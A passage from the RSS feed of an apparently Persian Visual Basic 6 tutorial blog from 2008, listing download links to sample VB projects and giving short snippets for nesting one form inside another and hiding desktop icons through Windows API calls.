<P><A href="http://www.sharemation.com/MahdiVB678/vb%20farsi%20saz/vb%20farsisaz.part02.rar?uniq=4pu242" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">بخش دوم</FONT></A><FONT face="Tahoma, Arial, Helvetica, sans-serif">&nbsp; </FONT><A href="http://www.sharemation.com/MahdiVB678/vb%20farsi%20saz/vb%20farsisaz.part03.rar?uniq=4pu245" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">بخش سوم</FONT></A><FONT face="Tahoma, Arial, Helvetica, sans-serif">&nbsp; </FONT><A href="http://www.sharemation.com/MahdiVB678/vb%20farsi%20saz/vb%20farsisaz.part04.rar?uniq=4pu248" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">بخش چهارم</FONT></A><FONT face="Tahoma, Arial, Helvetica, sans-serif">&nbsp; </FONT><A href="http://www.sharemation.com/MahdiVB678/vb%20farsi%20saz/vb%20farsisaz.part05.rar?uniq=4pu24b" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">بخش پنجم</FONT></A><FONT face="Tahoma, Arial, Helvetica, sans-serif">&nbsp; </FONT><A href="http://www.sharemation.com/MahdiVB678/vb%20farsi%20saz/vb%20farsisaz.part06.rar?uniq=4pu24e" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">بخش ششم</FONT></A><FONT face="Tahoma, Arial, Helvetica, sans-serif">&nbsp; </FONT><A href="http://www.sharemation.com/MahdiVB678/vb%20farsi%20saz/vb%20farsisaz.part07.rar?uniq=4pu24h" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">بخش هفتم</FONT></A><FONT face="Tahoma, Arial, Helvetica, sans-serif">&nbsp;</FONT><A href="http://www.sharemation.com/MahdiVB678/vb%20farsi%20saz/vb%20farsisaz.part08.rar?uniq=4pu24k" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">بخش هشتم</FONT></A><FONT face="Tahoma, Arial, Helvetica, sans-serif">&nbsp;</FONT><A href="http://www.sharemation.com/MahdiVB678/vb%20farsi%20saz/vb%20farsisaz.part09.rar?uniq=4pu24n" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">بخش نهم</FONT></A></P>
<P align=center><FONT face="Tahoma, Arial, Helvetica, sans-serif"><IMG alt="" hspace=0 src="http://i11.tinypic.com/2zjf7km.jpg" align=baseline border=0></FONT></P>
<P><A href="http://www.sharemation.com/MahdiVB678/new1/docking.zip?uniq=4pu2wd" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">پنجره شناور (اقا کمال) قسمتی از وی بی</FONT></A><FONT face="Tahoma, Arial, Helvetica, sans-serif">&nbsp;</FONT></P>
<P><A href="http://www.sharemation.com/MahdiVB678/new1/Fax-vb.rar?uniq=4pu2wg" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">فکس با وی بی</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/new1/fekr%20o%20bakr.zip?uniq=4pu2wj" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">فکر و بکر</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/new1/FieldSearch.zip?uniq=4pu2wm" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">جستجوی دیتا بیس</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/new1/filler.zip?uniq=4pu2wp" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">پر کننده گرافیکی</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/new1/Fish.zip?uniq=4pu2ws" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">اکواریــــــــــــــــــــــــــــــــم</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/new1/frdemo.rar?uniq=4pu2wv" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">جالبــــــــــــــــــــــــــــــــه</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/new1/Functions.zip?uniq=4pu2wy" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">توابــــــــــــــــــــــــــع</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/new1/Glass_Window.zip?uniq=4pu2x1" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">پنجره شفاف</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/new1/Glassy%20Form%201.0.rar?uniq=4pu2x4" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">پنجره شفاف 2</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/new1/IdleTime.zip?uniq=4pu2x7" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">محاسبه کننده زمان توقف موس</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/new1/Image%20Convertor.zip?uniq=4pu2xa" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">مبدل تصاویر</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/new1/Jpg%20Picture%20Effects.zip?uniq=4pu2xd" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">جلوه دهنده تصاویر</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/new1/LockFolder.zip?uniq=4pu2xg" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">قفل کننده پوشه ها</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/new1/Matrix.zip?uniq=4pu2xj" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">ماتریکس برای بچه های مهندسی و ریاضی</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/new1/mouse%20move.zip?uniq=4pu2xm" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">حرکت دهنده موس</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/new1/photo%20cut.zip?uniq=4pu2xp" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">برش دهنده تصاویر</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/new1/PinButton.rar?uniq=4pu2xs" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">پین باتون</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/new1/Ping.zip?uniq=4pu2xv" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">پینگ</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/new1/Pingip.zip?uniq=4pu2xy" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">پینگ ای پی</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/new1/Trace.zip?uniq=4pu2y1" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">Trace</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/new1/VFmp3player.zip?uniq=4pu2y4" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">طیف نما برای کارهای مولتی مدیا جالب</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/new1/world%20cup%202010.rar?uniq=4pu2y7" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">بک گراند Fifa برای جام جهانی 2010 خودم طراحی کردم</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/new1/zoom%20screen.zip?uniq=4pu2ya" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">شبیه سازی قسمت معلولین ویندوز</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/ACTIVEX.rar?uniq=4pp21m" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">اموزش Active X</FONT></A><FONT face="Tahoma, Arial, Helvetica, sans-serif"> </FONT></P>
<P><FONT face="Tahoma, Arial, Helvetica, sans-serif"></FONT></P>
<P><A href="http://www.sharemation.com/MahdiVB678/Bandwidth%20Meter%20with%20graph%20charts%20(MSChart).rar?uniq=4pp21s" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">سرعت سنج اینترنت خیلی جالبه</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/Browse%20For%20Folder.zip?uniq=4pp21y" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">جستجو در بین پوشه ها</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/Progressbar.zip?uniq=4pp224" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">یک Progress bar کاربردی و جالب</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/farsi/BoOTer.rar?uniq=4pp3ql" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">یک بوتر به همراه فایل اجرایش</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/farsi/combo%20open.rar?uniq=4pp3qr" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">باز کردن Combo box با زدن اینتر</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/farsi/complex.rar?uniq=4pp3qx" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">اعداد مختلط</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/farsi/CopyfileAsWindows.zip?uniq=4pp3r3" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">کپی فایل به همراه نوار پیشرفت</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/farsi/Countries%20List.zip?uniq=4pp3r9" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">فهرست کشورهای جهان برای شما </FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/farsi/date%20for%20stop.zip?uniq=4pp3rf" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">متوقف کردن برنامه در تاریخ معین شده</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/farsi/FAT%202%20NTFS.zip?uniq=4pp3rl" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">تبدیل Fat32 به Ntfs</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/farsi/FirewallAPP.zip?uniq=4pp3rr" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">دیوار اتش با VB</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/farsi/forrie.rar?uniq=4pp3rx" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">تبدیل فوریه برای بچه های الکترونیک و ریاضی</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/farsi/Image2Text.rar?uniq=4pp3s3" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">تبدیل عکس به متن</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/farsi/MultiComm%20(main).zip?uniq=4pp3s9" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">برنامه نمونه کار با پورت</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/farsi/Piano.zip?uniq=4pp3sf" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">پیانو</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/farsi/sample.rar?uniq=4pp3sl" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">یک نمونه کوچک از برنامه خودم(وی بی فارسی)(اقا کمال)</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/farsi/SocketProgramming.rar?uniq=4pp3sr" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">اموزش برنامه نویسی Socket Programing</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/farsi/split.rar?uniq=4pp3sx" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">یک نمونه کوچک از برنامه خودم (نوار مرزی)</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/farsi/strfind.zip?uniq=4pp3t3" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">یافتن متن</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/farsi/Txt2Jpg.zip?uniq=4pp3t9" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">تبدیل متن به عکس</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/farsi/VB2Delphi%20source.zip?uniq=4pp3tf" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">تبدیل کدهای وی بی به دلفی</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/farsi/wav%20veiw.rar?uniq=4pp3tr" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">شبیه سازی یک قسمت از Nero ( نمایش طیفی فایل صوتی)</FONT></A></P>
<P><A href="http://www.sharemation.com/MahdiVB678/farsi/WebBrowser.zip?uniq=4pp3tx" target=_blank><FONT face="Tahoma, Arial, Helvetica, sans-serif">کاوشگر اینترنت</FONT></A></P>]]></description>
					<pubDate>Wed, 16 Apr 2008 20:30:07 GMT</pubDate>
					<comments>http://amozesheiranian.blogsky.com/Comments.bs?PostID=60</comments>
          <guid>http://amozesheiranian.blogsky.com?PostID=60</guid>
				</item>
			
				<item>
					<title><![CDATA[یک فرم رو توی یک فرم دیگه]]></title>
					<link>http://amozesheiranian.blogsky.com?PostID=59</link>
					<description><![CDATA[تنها با دو خط کد میتونید جلوه ای رو بوجود بیارید که فکرشم نمی کردید. یک فرم رو توی یک فرم دیگه جابدید. استفاده های زیادی میشه ازش کرد. مثلا ساخت نوار ابزارهایی مثل اونی که فتوشاپ داره. راجع بهش فکر کنید<BR>این هم کدش<BR><BR>Private Declare Function SetParent Lib "user32" ( _<BR>ByVal hWndChild As Long, ByVal hWndNewParent As Long) As Long<BR><BR>Private Sub Form_Load()<BR>SetParent Form2.hWnd, hWnd<BR>Form2.Show<BR>End Sub<BR>]]></description>
					<pubDate>Wed, 16 Apr 2008 20:25:18 GMT</pubDate>
					<comments>http://amozesheiranian.blogsky.com/Comments.bs?PostID=59</comments>
          <guid>http://amozesheiranian.blogsky.com?PostID=59</guid>
				</item>
			
				<item>
					<title><![CDATA[با این تابع می تونید آیکون های روی دسکتاپ رو مخفی و ظاهر کنید]]></title>
					<link>http://amozesheiranian.blogsky.com?PostID=58</link>
					<description><![CDATA[اول فراخوانی توابع <BR><BR>Option Explicit<BR>Private Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long<BR>Private Declare Function ShowWindow Lib "user32" (ByVal hWnd As Long, ByVal nCmdShow As Long) As Long<BR><BR>بعد سه تا کامند برای ظاهر کردن آیکون ها مخفی کردن آنها و خروج از فرم بنویسید<BR><BR>کد هر کدام اینطور است<BR><BR>Private Sub cmdDHide_Click()<BR>Dim hWnd As Long<BR>hWnd = FindWindowEx(0&amp;, 0&amp;, "Progman", vbNullString)<BR>ShowWindow hWnd, 0<BR>End Sub'--------------------------------<BR>Private Sub cmdDShow_Click()<BR>Dim hWnd As Long<BR>hWnd = FindWindowEx(0&amp;, 0&amp;, "Progman", vbNullString)<BR>ShowWindow hWnd, 5<BR>End Sub'---------------------------------<BR>Private Sub c